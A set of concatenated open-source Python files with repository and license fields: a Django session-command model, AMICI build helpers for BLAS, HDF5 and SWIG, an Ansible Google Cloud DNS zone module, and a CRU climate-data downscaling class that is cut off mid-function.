# -*- coding: utf-8 -*-
#
import uuid
from django.db import models
from django.utils.translation import ugettext_lazy as _
from orgs.mixins.models import OrgModelMixin
class AbstractSessionCommand(OrgModelMixin):
RISK_LEVEL_ORDINARY = 0
RISK_LEVEL_DANGEROUS = 5
RISK_LEVEL_CHOICES = (
(RISK_LEVEL_ORDINARY, _('Ordinary')),
(RISK_LEVEL_DANGEROUS, _('Dangerous')),
)
id = models.UUIDField(default=uuid.uuid4, primary_key=True)
user = models.CharField(max_length=64, db_index=True, verbose_name=_("User"))
asset = models.CharField(max_length=128, db_index=True, verbose_name=_("Asset"))
system_user = models.CharField(max_length=64, db_index=True, verbose_name=_("System user"))
input = models.CharField(max_length=128, db_index=True, verbose_name=_("Input"))
output = models.CharField(max_length=1024, blank=True, verbose_name=_("Output"))
session = models.CharField(max_length=36, db_index=True, verbose_name=_("Session"))
risk_level = models.SmallIntegerField(default=RISK_LEVEL_ORDINARY, choices=RISK_LEVEL_CHOICES, db_index=True, verbose_name=_("Risk level"))
timestamp = models.IntegerField(db_index=True)
class Meta:
abstract = True
@classmethod
def from_dict(cls, d):
self = cls()
for k, v in d.items():
setattr(self, k, v)
return self
@classmethod
def from_multi_dict(cls, l):
commands = []
for d in l:
command = cls.from_dict(d)
commands.append(command)
return commands
def to_dict(self):
d = {}
for field in self._meta.fields:
d[field.name] = getattr(self, field.name)
return d
def __str__(self):
return self.input
|
gpl-2.0
|
FFroehlich/AMICI
|
python/amici/setuptools.py
|
1
|
9201
|
"""
setuptools
----------
Helper functions for AMICI core and module package preparation
"""
import os
import sys
import shlex
import subprocess
import shutil
from distutils import log
from .swig import find_swig, get_swig_version
try:
import pkgconfig # optional
# pkgconfig python module might be installed without pkg-config binary
# being available
pkgconfig.exists('somePackageName')
except (ModuleNotFoundError, EnvironmentError):
pkgconfig = None
from typing import Dict, List, Union, Tuple, Any
PackageInfo = Dict[str, List[Union[str, Tuple[str, Any]]]]
def get_blas_config() -> PackageInfo:
"""
Find CBLAS-compatible BLAS
:return:
blas related package information
"""
blaspkgcfg = {'include_dirs': [],
'library_dirs': [],
'libraries': [],
'define_macros': [],
'extra_compile_args': [],
'extra_link_args': []
}
# Check environment variables
if 'BLAS_CFLAGS' in os.environ:
blaspkgcfg['extra_compile_args'].extend(
shlex.split(os.environ['BLAS_CFLAGS'])
)
if 'BLAS_LIBS' in os.environ:
blaspkgcfg['extra_link_args'].extend(
shlex.split(os.environ['BLAS_LIBS'])
)
if 'BLAS_CFLAGS' in os.environ or 'BLAS_LIBS' in os.environ:
# If options have been provided by the user, we don't try to detect
# anything by ourselves
return blaspkgcfg
# Try environment modules
# MKL
if 'MKLROOT' in os.environ:
if 'MKL_INC' in os.environ:
blaspkgcfg['extra_compile_args'].extend(
shlex.split(os.environ['MKL_INC'])
)
if 'MKL_LIB' in os.environ:
blaspkgcfg['extra_link_args'].extend(
shlex.split(os.environ['MKL_LIB'])
)
blaspkgcfg['define_macros'].append(('AMICI_BLAS_MKL', None), )
return blaspkgcfg
# Try pkgconfig
if pkgconfig:
for blas_name in ['cblas', 'openblas']:
if pkgconfig.exists(blas_name):
blaspkgcfg = pkgconfig.parse(blas_name)
blaspkgcfg['extra_compile_args'] = [
pkgconfig.cflags(blas_name)
]
blaspkgcfg['extra_link_args'] = [
pkgconfig.libs(blas_name)
]
return blaspkgcfg
# If none of the previous worked, fall back to libcblas in default paths
blaspkgcfg['libraries'] = ['cblas']
return blaspkgcfg
def get_hdf5_config() -> PackageInfo:
"""
Find HDF5 include dir and libs
:return:
hdf5 related package information
"""
h5pkgcfg = {'include_dirs': [],
'library_dirs': [],
'libraries': [],
'define_macros': []
}
hdf5_include_dir_found = False
hdf5_library_dir_found = False
# try for hdf5 in standard locations
hdf5_include_dir_hints = [
'/usr/include/hdf5/serial',
'/usr/local/include',
'/usr/include', # travis ubuntu xenial, centos
'/usr/local/Cellar/hdf5/1.10.2_1/include' # travis macOS
]
hdf5_library_dir_hints = [
'/usr/lib/x86_64-linux-gnu/', # travis ubuntu xenial
'/usr/lib/x86_64-linux-gnu/hdf5/serial',
'/usr/local/lib',
'/usr/lib64/', # CentOS
'/usr/local/Cellar/hdf5/1.10.2_1/lib' # travis macOS
]
# special treatment for conda environments
# as the conda library dir is provided first, we should also check for
# conda header files first
if 'CONDA_DIR' in os.environ:
hdf5_include_dir_hints.insert(
0, os.path.join(os.environ['CONDA_DIR'], 'include'))
hdf5_library_dir_hints.insert(
0, os.path.join(os.environ['CONDA_DIR'], 'lib'))
# Check for Environment Modules variables
if 'HDF5_BASE' in os.environ:
hdf5_include_dir_hints.insert(
0, os.path.join(os.environ['HDF5_BASE'], 'include'))
hdf5_library_dir_hints.insert(
0, os.path.join(os.environ['HDF5_BASE'], 'lib'))
for hdf5_include_dir_hint in hdf5_include_dir_hints:
hdf5_include_dir_found = os.path.isfile(
os.path.join(hdf5_include_dir_hint, 'hdf5.h'))
if hdf5_include_dir_found:
log.info('hdf5.h found in %s' % hdf5_include_dir_hint)
h5pkgcfg['include_dirs'] = [hdf5_include_dir_hint]
break
for hdf5_library_dir_hint in hdf5_library_dir_hints:
# check for static or shared library
for lib_filename in ['libhdf5.a', 'libhdf5.so']:
hdf5_library_dir_found = os.path.isfile(
os.path.join(hdf5_library_dir_hint, lib_filename))
if hdf5_library_dir_found:
log.info(f'{lib_filename} found in {hdf5_library_dir_hint}')
h5pkgcfg['library_dirs'] = [hdf5_library_dir_hint]
break
if hdf5_library_dir_found:
# break to not override hdf5_library_dir_found
break
h5pkgcfg['found'] = hdf5_include_dir_found and hdf5_library_dir_found
if h5pkgcfg['found']:
return h5pkgcfg
if pkgconfig:
try:
h5pkgcfg = pkgconfig.parse('hdf5')
except pkgconfig.PackageNotFoundError:
pass
# NOTE: Cannot use pkgconfig.exists('hdf5f'), since this is true
# although no libraries or include dirs are available
h5pkgcfg['found'] = 'include_dirs' in h5pkgcfg \
and h5pkgcfg['include_dirs'] and \
'library_dirs' in h5pkgcfg \
and h5pkgcfg['library_dirs']
return h5pkgcfg
def add_coverage_flags_if_required(cxx_flags: List[str],
linker_flags: List[str]) -> None:
"""
Add compiler and linker flags if gcov coverage requested
:param cxx_flags:
list of existing cxx flags
:param linker_flags:
list of existing linker flags
"""
if 'ENABLE_GCOV_COVERAGE' in os.environ and \
os.environ['ENABLE_GCOV_COVERAGE'].upper() == 'TRUE':
log.info("ENABLE_GCOV_COVERAGE was set to TRUE."
" Building AMICI with coverage symbols.")
cxx_flags.extend(['-g', '-O0', '--coverage'])
linker_flags.extend(['--coverage', '-g'])
def add_debug_flags_if_required(cxx_flags: List[str],
linker_flags: List[str]) -> None:
"""
Add compiler and linker debug flags if requested
Arguments:
:param cxx_flags:
list of existing cxx flags
:param linker_flags:
list of existing linker flags
"""
if 'ENABLE_AMICI_DEBUGGING' in os.environ \
and os.environ['ENABLE_AMICI_DEBUGGING'] == 'TRUE':
log.info("ENABLE_AMICI_DEBUGGING was set to TRUE."
" Building AMICI with debug symbols.")
cxx_flags.extend(['-g', '-O0'])
linker_flags.extend(['-g'])
def generate_swig_interface_files(with_hdf5: bool = None) -> None:
"""
Compile the swig python interface to amici
"""
swig_outdir = os.path.join(os.path.abspath(os.getcwd()), "amici")
swig_exe = find_swig()
swig_version = get_swig_version(swig_exe)
swig_args = [
'-c++',
'-python',
'-py3',
'-threads',
f'-Iamici{os.sep}swig',
f'-Iamici{os.sep}include',
]
log.info(f"Found SWIG version {swig_version}")
# Are HDF5 includes available to generate the wrapper?
if with_hdf5 is None:
with_hdf5 = get_hdf5_config()['found']
if not with_hdf5:
swig_args.append('-DAMICI_SWIG_WITHOUT_HDF5')
# Do we have -doxygen?
if swig_version >= (4, 0, 0):
swig_args.append('-doxygen')
swig_cmd = [swig_exe,
*swig_args,
'-outdir', swig_outdir,
'-o', os.path.join("amici", "amici_wrap.cxx"),
os.path.join("amici", "swig", "amici.i")]
log.info(f"Running SWIG: {' '.join(swig_cmd)}")
sp = subprocess.run(swig_cmd, stdout=subprocess.PIPE,
stderr=sys.stdout.buffer)
if not sp.returncode == 0:
raise AssertionError('Swigging AMICI failed:\n'
+ sp.stdout.decode('utf-8'))
def add_openmp_flags(cxx_flags: List, ldflags: List) -> None:
"""Add OpenMP flags to lists for compiler/linker flags (in-place)"""
# Enable OpenMP support for Linux / OSX:
if sys.platform == 'linux':
log.info("Adding OpenMP flags...")
cxx_flags.append("-fopenmp")
ldflags.append("-fopenmp")
elif sys.platform == 'darwin':
if os.path.exists('/usr/local/lib/libomp.a'):
log.info("Adding OpenMP flags...")
cxx_flags.extend(["-Xpreprocessor", "-fopenmp"])
ldflags.extend(["-Xpreprocessor", "-fopenmp", "-lomp"])
else:
log.info("Not adding OpenMP flags, because /usr/local/lib/libomp.a"
" does not exist. To enable, run `brew install libomp` "
"or add flags manually.")
|
bsd-2-clause
|
civisanalytics/ansible
|
lib/ansible/modules/cloud/google/gcdns_zone.py
|
25
|
12939
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015 CallFire Inc.
#
# This file is part of Ansible.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: gcdns_zone
short_description: Creates or removes zones in Google Cloud DNS
description:
- Creates or removes managed zones in Google Cloud DNS.
version_added: "2.2"
author: "William Albert (@walbert947)"
requirements:
- "python >= 2.6"
- "apache-libcloud >= 0.19.0"
options:
state:
description:
- Whether the given zone should or should not be present.
required: false
choices: ["present", "absent"]
default: "present"
zone:
description:
- The DNS domain name of the zone.
- This is NOT the Google Cloud DNS zone ID (e.g., example-com). If
you attempt to specify a zone ID, this module will attempt to
create a TLD and will fail.
required: true
aliases: ['name']
description:
description:
- An arbitrary text string to use for the zone description.
required: false
default: ""
service_account_email:
description:
- The e-mail address for a service account with access to Google
Cloud DNS.
required: false
default: null
pem_file:
description:
- The path to the PEM file associated with the service account
email.
- This option is deprecated and may be removed in a future release.
Use I(credentials_file) instead.
required: false
default: null
credentials_file:
description:
- The path to the JSON file associated with the service account
email.
required: false
default: null
project_id:
description:
- The Google Cloud Platform project ID to use.
required: false
default: null
notes:
- See also M(gcdns_record).
- Zones that are newly created must still be set up with a domain registrar
before they can be used.
'''
EXAMPLES = '''
# Basic zone creation example.
- name: Create a basic zone with the minimum number of parameters.
gcdns_zone: zone=example.com
# Zone removal example.
- name: Remove a zone.
gcdns_zone: zone=example.com state=absent
# Zone creation with description
- name: Creating a zone with a description
gcdns_zone: zone=example.com description="This is an awesome zone"
'''
RETURN = '''
description:
description: The zone's description
returned: success
type: string
sample: This is an awesome zone
state:
description: Whether the zone is present or absent
returned: success
type: string
sample: present
zone:
description: The zone's DNS name
returned: success
type: string
sample: example.com.
'''
################################################################################
# Imports
################################################################################
from distutils.version import LooseVersion
try:
from libcloud import __version__ as LIBCLOUD_VERSION
from libcloud.common.google import InvalidRequestError
from libcloud.common.google import ResourceExistsError
from libcloud.common.google import ResourceNotFoundError
from libcloud.dns.types import Provider
HAS_LIBCLOUD = True
except ImportError:
HAS_LIBCLOUD = False
################################################################################
# Constants
################################################################################
# Apache libcloud 0.19.0 was the first to contain the non-beta Google Cloud DNS
# v1 API. Earlier versions contained the beta v1 API, which has since been
# deprecated and decommissioned.
MINIMUM_LIBCLOUD_VERSION = '0.19.0'
# The libcloud Google Cloud DNS provider.
PROVIDER = Provider.GOOGLE
# The URL used to verify ownership of a zone in Google Cloud DNS.
ZONE_VERIFICATION_URL= 'https://www.google.com/webmasters/verification/'
################################################################################
# Functions
################################################################################
def create_zone(module, gcdns, zone):
"""Creates a new Google Cloud DNS zone."""
description = module.params['description']
extra = dict(description = description)
zone_name = module.params['zone']
# Google Cloud DNS wants the trailing dot on the domain name.
if zone_name[-1] != '.':
zone_name = zone_name + '.'
# If we got a zone back, then the domain exists.
if zone is not None:
return False
# The zone doesn't exist yet.
try:
if not module.check_mode:
gcdns.create_zone(domain=zone_name, extra=extra)
return True
except ResourceExistsError:
# The zone already exists. We checked for this already, so either
# Google is lying, or someone was a ninja and created the zone
# within milliseconds of us checking for its existence. In any case,
# the zone has already been created, so we have nothing more to do.
return False
except InvalidRequestError as error:
if error.code == 'invalid':
# The zone name or a parameter might be completely invalid. This is
# typically caused by an illegal DNS name (e.g. foo..com).
module.fail_json(
msg = "zone name is not a valid DNS name: %s" % zone_name,
changed = False
)
elif error.code == 'managedZoneDnsNameNotAvailable':
# Google Cloud DNS will refuse to create zones with certain domain
# names, such as TLDs, ccTLDs, or special domain names such as
# example.com.
module.fail_json(
msg = "zone name is reserved or already in use: %s" % zone_name,
changed = False
)
elif error.code == 'verifyManagedZoneDnsNameOwnership':
# This domain name needs to be verified before Google will create
# it. This occurs when a user attempts to create a zone which shares
# a domain name with a zone hosted elsewhere in Google Cloud DNS.
module.fail_json(
msg = "ownership of zone %s needs to be verified at %s" % (zone_name, ZONE_VERIFICATION_URL),
changed = False
)
else:
# The error is something else that we don't know how to handle,
# so we'll just re-raise the exception.
raise
def remove_zone(module, gcdns, zone):
"""Removes an existing Google Cloud DNS zone."""
# If there's no zone, then we're obviously done.
if zone is None:
return False
# An empty zone will have two resource records:
# 1. An NS record with a list of authoritative name servers
# 2. An SOA record
# If any additional resource records are present, Google Cloud DNS will
# refuse to remove the zone.
if len(zone.list_records()) > 2:
module.fail_json(
msg = "zone is not empty and cannot be removed: %s" % zone.domain,
changed = False
)
try:
if not module.check_mode:
gcdns.delete_zone(zone)
return True
except ResourceNotFoundError:
# When we performed our check, the zone existed. It may have been
# deleted by something else. It's gone, so whatever.
return False
except InvalidRequestError as error:
if error.code == 'containerNotEmpty':
# When we performed our check, the zone existed and was empty. In
# the milliseconds between the check and the removal command,
# records were added to the zone.
module.fail_json(
msg = "zone is not empty and cannot be removed: %s" % zone.domain,
changed = False
)
else:
# The error is something else that we don't know how to handle,
# so we'll just re-raise the exception.
raise
def _get_zone(gcdns, zone_name):
"""Gets the zone object for a given domain name."""
# To create a zone, we need to supply a zone name. However, to delete a
# zone, we need to supply a zone ID. Zone ID's are often based on zone
# names, but that's not guaranteed, so we'll iterate through the list of
# zones to see if we can find a matching name.
available_zones = gcdns.iterate_zones()
found_zone = None
for zone in available_zones:
if zone.domain == zone_name:
found_zone = zone
break
return found_zone
def _sanity_check(module):
"""Run module sanity checks."""
zone_name = module.params['zone']
# Apache libcloud needs to be installed and at least the minimum version.
if not HAS_LIBCLOUD:
module.fail_json(
msg = 'This module requires Apache libcloud %s or greater' % MINIMUM_LIBCLOUD_VERSION,
changed = False
)
elif LooseVersion(LIBCLOUD_VERSION) < MINIMUM_LIBCLOUD_VERSION:
module.fail_json(
msg = 'This module requires Apache libcloud %s or greater' % MINIMUM_LIBCLOUD_VERSION,
changed = False
)
# Google Cloud DNS does not support the creation of TLDs.
if '.' not in zone_name or len([label for label in zone_name.split('.') if label]) == 1:
module.fail_json(
msg = 'cannot create top-level domain: %s' % zone_name,
changed = False
)
################################################################################
# Main
################################################################################
def main():
"""Main function"""
module = AnsibleModule(
argument_spec = dict(
state = dict(default='present', choices=['present', 'absent'], type='str'),
zone = dict(required=True, aliases=['name'], type='str'),
description = dict(default='', type='str'),
service_account_email = dict(type='str'),
pem_file = dict(type='path'),
credentials_file = dict(type='path'),
project_id = dict(type='str')
),
supports_check_mode = True
)
_sanity_check(module)
zone_name = module.params['zone']
state = module.params['state']
# Google Cloud DNS wants the trailing dot on the domain name.
if zone_name[-1] != '.':
zone_name = zone_name + '.'
json_output = dict(
state = state,
zone = zone_name,
description = module.params['description']
)
# Build a connection object that was can use to connect with Google
# Cloud DNS.
gcdns = gcdns_connect(module, provider=PROVIDER)
# We need to check if the zone we're attempting to create already exists.
zone = _get_zone(gcdns, zone_name)
diff = dict()
# Build the 'before' diff
if zone is None:
diff['before'] = ''
diff['before_header'] = '<absent>'
else:
diff['before'] = dict(
zone = zone.domain,
description = zone.extra['description']
)
diff['before_header'] = zone_name
# Create or remove the zone.
if state == 'present':
diff['after'] = dict(
zone = zone_name,
description = module.params['description']
)
diff['after_header'] = zone_name
changed = create_zone(module, gcdns, zone)
elif state == 'absent':
diff['after'] = ''
diff['after_header'] = '<absent>'
changed = remove_zone(module, gcdns, zone)
module.exit_json(changed=changed, diff=diff, **json_output)
from ansible.module_utils.basic import *
from ansible.module_utils.gcdns import *
if __name__ == '__main__':
main()
|
gpl-3.0
|
ua-snap/downscale
|
snap_scripts/old_scripts/tem_iem_older_scripts_april2018/tem_inputs_iem/old_code/cru_ts_downscaling_class_d.py
|
3
|
20625
|
# # #
# Downscale CRU Historical TS3.x data to a pre-processed climatology
# extent, resolution, reference system
#
# Author: Michael Lindgren ([email protected])
# # #
# import some modules
import rasterio, xray, os
import numpy as np
import pandas as pd
import numpy as np
class DownscalingUtils( object ):
def write_gtiff( self, output_arr, template_meta, output_filename, compress=True ):
'''
DESCRIPTION:
------------
output a GeoTiff given a numpy ndarray, rasterio-style
metadata dictionary, and and output_filename.
If a multiband file is to be processed, the Longitude
dimension is expected to be the right-most.
--> dimensions should be (band, latitude, longitude)
ARGUMENTS:
----------
output_arr = [numpy.ndarray] with longitude as the right-most dimension
template_meta = [dict] rasterio-style raster meta dictionary. Typically
found in a template raster by: rasterio.open( fn ).meta
output_filename = [str] path to and name of the output GeoTiff to be
created. currently only 'GTiff' is supported.
compress = [bool] if True (default) LZW-compression is applied to the
output GeoTiff. If False, no compression is applied.
* this can also be added (along with many other gdal creation options)
to the template meta as a key value pair template_meta.update( compress='lzw' ).
See Rasterio documentation for more details. This is just a common one that is
RETURNS:
--------
string path to the new output_filename created
'''
import os
if 'transform' in template_meta.keys():
_ = template_meta.pop( 'transform' )
if not output_filename.endswith( '.tif' ):
UserWarning( 'output_filename does not end with ".tif", it has been fixed for you.' )
output_filename = os.path.splitext( output_filename )[0] + '.tif'
if output_arr.ndim == 2:
# add in a new dimension - can get you into trouble with very large rasters...
output_arr = output_arr[ np.newaxis, ... ]
elif output_arr.ndim < 2:
raise ValueError( 'output_arr must have at least 2 dimensions' )
nbands, nrows, ncols = output_arr.shape
if template_meta[ 'count' ] != nbands:
raise ValueError( 'template_meta[ "count" ] must match output_arr bands' )
if compress == True and 'compress' not in template_meta.keys():
template_meta.update( compress='lzw' )
with rasterio.open( output_filename, 'w', **template_meta ) as out:
for band in range( 1, nbands+1 ):
out.write( output_arr[ band-1, ... ], band )
return output_filename
def shiftgrid( self, lon0, datain, lonsin, start=True, cyclic=360.0 ):
"""
Shift global lat/lon grid east or west.
.. tabularcolumns:: |l|L|
============== ====================================================
Arguments Description
============== ====================================================
lon0 starting longitude for shifted grid
(ending longitude if start=False). lon0 must be on
input grid (within the range of lonsin).
datain original data with longitude the right-most
dimension.
lonsin original longitudes.
============== ====================================================
.. tabularcolumns:: |l|L|
============== ====================================================
Keywords Description
============== ====================================================
start if True, lon0 represents the starting longitude
of the new grid. if False, lon0 is the ending
longitude. Default True.
cyclic width of periodic domain (default 360)
============== ====================================================
returns ``dataout,lonsout`` (data and longitudes on shifted grid).
"""
if np.fabs(lonsin[-1]-lonsin[0]-cyclic) > 1.e-4:
# Use all data instead of raise ValueError, 'cyclic point not included'
start_idx = 0
else:
# If cyclic, remove the duplicate point
start_idx = 1
if lon0 < lonsin[0] or lon0 > lonsin[-1]:
raise ValueError('lon0 outside of range of lonsin')
i0 = np.argmin(np.fabs(lonsin-lon0))
i0_shift = len(lonsin)-i0
if np.ma.isMA(datain):
dataout = np.ma.zeros(datain.shape,datain.dtype)
else:
dataout = np.zeros(datain.shape,datain.dtype)
if np.ma.isMA(lonsin):
lonsout = np.ma.zeros(lonsin.shape,lonsin.dtype)
else:
lonsout = np.zeros(lonsin.shape,lonsin.dtype)
if start:
lonsout[0:i0_shift] = lonsin[i0:]
else:
lonsout[0:i0_shift] = lonsin[i0:]-cyclic
dataout[...,0:i0_shift] = datain[...,i0:]
if start:
lonsout[i0_shift:] = lonsin[start_idx:i0+start_idx]+cyclic
else:
lonsout[i0_shift:] = lonsin[start_idx:i0+start_idx]
dataout[...,i0_shift:] = datain[...,start_idx:i0+start_idx]
return dataout,lonsout
def bounds_to_extent( self, bounds ):
'''
take input rasterio bounds object and return an extent
'''
l,b,r,t = bounds
return [ (l,b), (r,b), (r,t), (l,t), (l,b) ]
def padded_bounds( self, rst, npixels, crs ):
'''
convert the extents of 2 overlapping rasters to a shapefile with
an expansion of the intersection of the rasters extents by npixels
rst1: rasterio raster object
rst2: rasterio raster object
npixels: tuple of 4 (left(-),bottom(-),right(+),top(+)) number of pixels to
expand in each direction. for 5 pixels in each direction it would look like
this: (-5. -5. 5, 5) or just in the right and top directions like this:
(0,0,5,5).
crs: epsg code or proj4string defining the geospatial reference
system
output_shapefile: string full path to the newly created output shapefile
'''
import rasterio, os, sys
from shapely.geometry import Polygon
resolution = rst.res[0]
new_bounds = [ bound+(expand*resolution) for bound, expand in zip( rst.bounds, npixels ) ]
return new_bounds
def xyz_to_grid( self, x, y, z, grid, method='cubic', output_dtype=np.float32 ):
'''
interpolate points to a grid. simple wrapper around
scipy.interpolate.griddata. Points and grid must be
in the same coordinate system
x = 1-D np.array of x coordinates / x,y,z must be same length
y = 1-D np.array of y coordinates / x,y,z must be same length
z = 1-D np.array of z coordinates / x,y,z must be same length
grid = tuple of meshgrid as made using numpy.meshgrid()
order (xi, yi)
method = one of 'cubic', 'near', 'linear'
'''
from scipy.interpolate import griddata
zi = griddata( (x, y), z, grid, method=method )
zi = np.flipud( zi.astype( output_dtype ) )
return zi
def calc_anomalies( self, fn, variable, climatology_begin='1961', climatology_end='1990', absolute=True, *args, **kwargs ):
'''
calculate absolute or relative anomalies given a NetCDF file
of the Climatic Research Unit (CRU) Historical Time Series.
'''
import xray
ds = xray.open_dataset( fn )
try:
clim_ds = ds.loc[ {'time':slice(climatology_begin, climatology_end)} ]
climatology = clim_ds[ variable ].groupby( 'time.month' ).mean( 'time' )
except:
AttributeError( 'cannot slice netcdf based on climatology years given. they must overlap.' )
# calculate anomalies
if absolute == True:
anomalies = ds[ variable ].groupby( 'time.month' ) - climatology
elif absolute == False:
anomalies = ds[ variable ].groupby( 'time.month' ) / climatology
else:
AttributeError( 'calc_anomalies: absolute can only be True or False' )
return anomalies
def interpolate_anomalies( self, anom_df, meshgrid_tuple, template_raster_fn, lons_pcll, \
src_transform, src_crs, src_nodata, output_filename, write_anomalies, *args, **kwargs ):
'''
run the interpolation to a grid, and reprojection / resampling to the Alaska / Canada rasters
extent, resolution, origin (template_raster).
This function is intended to be used to run a pathos.multiprocessing Pool's map function
across a list of pre-computed arguments.
ARGUMENTS:
---------
anom_df = []
meshgrid_tuple = []
template_raster_fn = []
lons_pcll = []
src_transform = []
src_crs = []
src_nodata = []
output_filename = []
write_anomalies = []
RETURNS:
-------
if write_anomalies == True: [str] path to the output filename generated
if write_anomalies == False: [tuple] interpolated NumPy ndarray representing the
interpolated anomalies and the rasterio-style metadata dictionary describing
the newly generated raster.
'''
from rasterio.warp import reproject, RESAMPLING
template_raster = rasterio.open( template_raster_fn )
template_meta = template_raster.meta
if 'transform' in template_meta.keys():
template_meta.pop( 'transform' )
# update some meta configs
template_meta.update( compress='lzw', crs={'init':'epsg:3338'} )
interp_arr = self.xyz_to_grid( np.array(anom_df['lon'].tolist()), \
np.array(anom_df['lat'].tolist()), \
np.array(anom_df['anom'].tolist()), grid=meshgrid_tuple, method='cubic' )
src_nodata = -9999.0 # nodata
interp_arr[ np.isnan( interp_arr ) ] = src_nodata
dat, lons = self.shiftgrid( 180., interp_arr, lons_pcll, start=False )
output_arr = np.empty_like( template_raster.read( 1 ) )
reproject( dat, output_arr, src_transform=src_transform, src_crs=src_crs, src_nodata=src_nodata, \
dst_transform=template_meta['affine'], dst_crs=template_meta['crs'],\
dst_nodata=None, resampling=RESAMPLING.cubic_spline, SOURCE_EXTRA=1000 )
# mask it with the internal mask in the template raster, where 0 is oob.
output_arr = np.ma.masked_where( template_raster.read_masks( 1 ) == 0, output_arr )
output_arr.fill_value = template_meta[ 'nodata' ]
output_arr = output_arr.filled()
if write_anomalies == True:
out = self.write_gtiff( output_arr, template_meta, output_filename, compress=True )
elif write_anomalies == False:
out = ( output_arr, template_meta )
else:
AttributeError( 'interpolate_anomalies: write_anomalies can be True or False only.')
return out
def downscale( self, anom_arr, baseline_arr, output_filename, \
downscaling_operation, meta, post_downscale_function, *args, **kwargs ):
'''
downscale an anomaly array with a baseline array from the same period.
Arguments:
----------
anom_arr = [ np.ndarray ] 2-D NumPy array representing a raster domain.
anom/baseline arrays must be same shape.
baseline_arr = [ np.ndarray ] 2-D NumPy array representing a raster domain.
anom/baseline arrays must be same shape.
output_filename = [ str ] full path and output filename to be created
downscaling_operation = [ ]
meta = [ dict ] rasterio-style dictionary of raster metadata attributes. This
must jive with the dimensions and the data type of the array generated
through downscaling anom_arr with baseline_arr.
post_downscale_function = [ function ] a function that takes a 2-D downscaled
array as input and returns an array of the same shape / datatype. This
is typically used as a post-mortem for clamping the values from an output
downscaled array that may be slightly outside the range due to the
interpolation method. We currently use this to clamp the values of the hur
to 0-100.
Returns:
--------
output_filename of newly generated downscaled raster.
'''
def add( base, anom ):
return base + anom
def mult( base, anom ):
return base * anom
def div( base, anom ):
# this one may not be useful, but the placeholder is here
# return base / anom
return NotImplementedError
try:
operation_switch = { 'add':add, 'mult':mult, 'div':div }
except:
AttributeError( 'downscale: incorrect downscaling_operation str' )
# [ CHECK ] This may be something better to be done before passing to this function
# both files need to be masked here since we use a RIDICULOUS oob value...
# for both tas and cld, values less than -200 are out of the range of acceptable values and it
# grabs the -3.4... mask values. so lets mask using this
baseline_arr = np.ma.masked_where( baseline_arr < -200, baseline_arr )
anom_arr = np.ma.masked_where( anom_arr < -200, anom_arr )
output_arr = operation_switch[ downscaling_operation ]( baseline_arr, anom_arr )
output_arr[ np.isinf( output_arr ) ] = meta[ 'nodata' ]
if post_downscale_function != None:
output_arr = post_downscale_function( output_arr )
if 'transform' in meta.keys():
# avoid the gdal geotransform deprecation warning
meta.pop( 'transform' )
with rasterio.open( output_filename, 'w', **meta ) as out:
out.write( output_arr, 1 )
return output_filename
class DownscaleCRU( object ):
'''
methods to downscale the Climatic Research Unit's (CRU) Historical
Time Series data using a 12-month climatology pre-processed to the final
output domain and resolution. Typically we use a PRISM climatology or a
CRU CL2.0 climatology for these purposes.
'''
def __init__( self, cru_ts, clim_path, template_raster_fn, base_path, climatology_begin='1961', climatology_end='1990', ncores=2, \
absolute=True, metric='metric', variable=None, post_downscale_function=None, src_crs={'init':'epsg:4326'}, write_anomalies=True, *args, **kwargs ):
self.cru_ts = cru_ts
self.clim_path = clim_path
self.template_raster_fn = template_raster_fn
self.base_path = base_path
self.climatology_begin = climatology_begin
self.climatology_end = climatology_end
self.ncores = ncores
self.absolute = absolute
self.metric = metric
self.variable = variable
self.post_downscale_function = post_downscale_function
self.src_crs = src_crs
self.utils = DownscalingUtils()
self.write_anomalies = write_anomalies
@staticmethod
def _fn_month_grouper( fn, *args, **kwargs ):
'''
take a filename and return the month element of the naming convention
'''
return os.path.splitext( os.path.basename( fn ) )[0].split( '_' )[-2]
def _get_varname_cru( self, *args, **kwargs ):
'''
take as input the cru ts3* netcdf filename and return (if possible)
the name of the variable we want to work on from that netcdf.
Arguments:
nc_fn = [str] filepath to the cru ts* netcdf file used in downscaling
Returns:
the variable name as a string if it can be deduced, and errors if
the variable name cannot be deduced.
'''
ds = xray.open_dataset( self.cru_ts )
variables = ds.variables.keys()
variable = [ variable for variable in variables \
if variable not in [u'lon', u'lat', u'time'] ]
if len( variable ) == 1:
variable = variable[ 0 ]
else:
AttributeError( 'cannot deduce the variable from the file. supply nc_varname and re-run' )
return variable
def _get_years_cru( self, *args, **kwargs ):
ds = xray.open_dataset( self.cru_ts )
time = pd.DatetimeIndex( ds.time.values )
years = [ year.year for year in time ]
return years
def _get_version_cru( self, *args, **kwargs ):
version = ''.join( os.path.basename( self.cru_ts ).split( '.' )[:2] )
version = version.replace( 'ts', 'TS' ) # to follow convention
return version
def _interp_downscale_wrapper( self, args_dict, *args, **kwargs ):
'''
interpolate anomalies and downscale to the baseline arr
'''
output_filename = args_dict[ 'output_filename' ]
args_dict.update( output_filename=output_filename.replace( 'downscaled', 'anom' ) )
anom = self.utils.interpolate_anomalies( **args_dict )
if isinstance( anom, basestring ):
rst = rasterio.open( anom )
meta = rst.meta
meta.update( compress='lzw' )
anom_arr = rst.read( 1 )
elif isinstance( anom, tuple ): # isinstance( anom, tuple ):
anom_arr, meta = anom
else:
AttributeError( '_interp_downscale_wrapper: passed wrong instance type' )
args_dict.update( output_filename=output_filename, anom_arr=anom_arr, meta=meta )
return self.utils.downscale( **args_dict )
def downscale_cru_ts( self, *args, **kwargs ):
'''
run the CRU downscaling using the monthly climatology files given
'''
from pathos.mp_map import mp_map
import glob, affine, rasterio
nc_varname = self._get_varname_cru( )
# handle cases where the desired varname != one parsed from file.
if self.variable == None:
variable = nc_varname
else:
variable = self.variable
# build output dirs
anomalies_path = os.path.join( base_path, variable, 'anom' )
if not os.path.exists( anomalies_path ):
os.makedirs( anomalies_path )
downscaled_path = os.path.join( base_path, variable, 'downscaled' )
if not os.path.exists( downscaled_path ):
